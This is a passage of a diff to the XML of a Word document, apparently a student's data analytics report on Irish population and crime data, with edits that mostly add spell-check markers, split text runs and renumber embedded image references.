+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>dropna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">() has been used in this </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>dataframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5594,6 +5740,7 @@
         </w:rPr>
         <w:t xml:space="preserve">EDA allows us to gain an overall understanding of the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
@@ -5616,7 +5763,14 @@
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>rames, detect relationships between variables, and examine the distribution of the variables of interest. In this study, the exploratory data analysis (EDA) step will be used to perform both statistical analysis and visualization tasks.</w:t>
+        <w:t>rames</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>, detect relationships between variables, and examine the distribution of the variables of interest. In this study, the exploratory data analysis (EDA) step will be used to perform both statistical analysis and visualization tasks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5728,7 +5882,7 @@
                                           <pic:cNvPicPr/>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId7"/>
+                                          <a:blip r:embed="rId8"/>
                                           <a:stretch>
                                             <a:fillRect/>
                                           </a:stretch>
@@ -5796,7 +5950,7 @@
                                     <pic:cNvPicPr/>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId7"/>
+                                    <a:blip r:embed="rId8"/>
                                     <a:stretch>
                                       <a:fillRect/>
                                     </a:stretch>
@@ -5896,7 +6050,7 @@
                                           <pic:cNvPicPr/>
                                         </pic:nvPicPr>
                                         <pic:blipFill rotWithShape="1">
-                                          <a:blip r:embed="rId8"/>
+                                          <a:blip r:embed="rId9"/>
                                           <a:srcRect r="5380"/>
                                           <a:stretch/>
                                         </pic:blipFill>
@@ -5967,7 +6121,7 @@
                                     <pic:cNvPicPr/>
                                   </pic:nvPicPr>
                                   <pic:blipFill rotWithShape="1">
-                                    <a:blip r:embed="rId8"/>
+                                    <a:blip r:embed="rId9"/>
                                     <a:srcRect r="5380"/>
                                     <a:stretch/>
                                   </pic:blipFill>
@@ -6033,12 +6187,14 @@
         </w:rPr>
         <w:t xml:space="preserve">, the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
         <w:t>population_df</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
@@ -6049,7 +6205,21 @@
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">  and crime_df </w:t>
+        <w:t xml:space="preserve">  and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>crime_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6130,7 +6300,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>This process will be performed on Jupyter notebook:</w:t>
+        <w:t xml:space="preserve">This process will be performed on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Jupyter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> notebook:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6150,8 +6338,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
-      </w:r>
+        <w:t>MSC_DA_CA1_Jose_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6160,7 +6349,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>.ipynb</w:t>
+        <w:t>Mario</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6170,7 +6359,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>.ipynb</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6185,71 +6374,30 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>and it was called</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> “</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hase 0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - EDA </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it was called</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6257,6 +6405,66 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hase 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - EDA </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>Skewness:</w:t>
@@ -6409,13 +6617,41 @@
         </w:rPr>
         <w:t xml:space="preserve">or </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>distplots can be used to visualize skewness. However, distplots are generally considered to be a better option because they provide more information about the shape of the data distribution.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>distplots</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can be used to visualize skewness. However, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>distplots</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> are generally considered to be a better option because they provide more information about the shape of the data distribution.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6452,7 +6688,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9">
+                    <a:blip r:embed="rId10">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6503,6 +6739,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Figure 01: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6511,8 +6748,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">distplot </w:t>
-      </w:r>
+        <w:t>distplot</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6521,8 +6759,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6531,7 +6770,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6541,7 +6780,28 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Skewness </w:t>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Skewness</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6703,7 +6963,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6737,6 +6997,7 @@
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6748,6 +7009,7 @@
         </w:rPr>
         <w:t>BoxPlot</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6904,8 +7166,19 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>dentify outliers</w:t>
-      </w:r>
+        <w:t xml:space="preserve">dentify </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>outliers</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6978,7 +7251,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11">
+                    <a:blip r:embed="rId12">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7045,8 +7318,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">: Boxplot  </w:t>
-      </w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7055,7 +7329,28 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>- population by region</w:t>
+        <w:t xml:space="preserve">Boxplot  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> population by region</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7143,7 +7438,15 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t>Outliers are data points that significantly differ from the majority of observations in a dataset. They can be caused by various factors, including measurement errors, data entry errors, or natural variation in the population.</w:t>
+        <w:t xml:space="preserve">Outliers are data points that significantly differ from </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>the majority of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> observations in a dataset. They can be caused by various factors, including measurement errors, data entry errors, or natural variation in the population.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7196,7 +7499,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7514,7 +7817,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13">
+                    <a:blip r:embed="rId14">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7702,7 +8005,27 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>Pie charts use a 1D array as input, so we need to convert the data variable to a 1D array using the NumPy ravel() function.</w:t>
+        <w:t xml:space="preserve">Pie charts use a 1D array as input, so we need to convert the data variable to a 1D array using the NumPy </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>ravel(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>) function.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7771,7 +8094,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14">
+                    <a:blip r:embed="rId15">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -8061,7 +8384,27 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>the population of Ireland is becoming more concentrated in the Dublin region. This may be due to a number of factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
+        <w:t xml:space="preserve">the population of Ireland is becoming more concentrated in the Dublin region. This may be due to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>a number of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8143,7 +8486,15 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t>We can use a set of tools and techniques for collecting, organizing, summarizing, analyzing, and interpreting data.</w:t>
+        <w:t xml:space="preserve">We can use a set of tools and techniques for collecting, organizing, summarizing, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>analyzing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, and interpreting data.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -8182,8 +8533,9 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">Statistical techniques were employed in this project within the Jupyter notebook named </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Statistical techniques were employed in this project within the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8198,8 +8550,9 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
+        <w:t>Jupyter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8214,7 +8567,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>MSC_DA_CA1_Jose_Mario.ipynb</w:t>
+        <w:t xml:space="preserve"> notebook named </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8230,7 +8583,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>”,</w:t>
+        <w:t>“</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8246,7 +8599,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> encompassing both </w:t>
+        <w:t>MSC_DA_CA1_Jose_Mario.ipynb</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8262,7 +8615,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>“</w:t>
+        <w:t>”,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8278,7 +8631,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>Phase 3, which focused on statistics, and Phase 4, which centered on machine learning</w:t>
+        <w:t xml:space="preserve"> encompassing both </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8294,7 +8647,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>”</w:t>
+        <w:t>“</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8310,8 +8663,9 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Phase 3, which focused on statistics, and Phase 4, which </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8326,14 +8680,10 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+        <w:t>centered</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -8347,7 +8697,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> on machine learning</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8362,7 +8713,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>By u</w:t>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8378,7 +8729,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>sing the method describe, we can get important information from the result</w:t>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8394,6 +8745,74 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
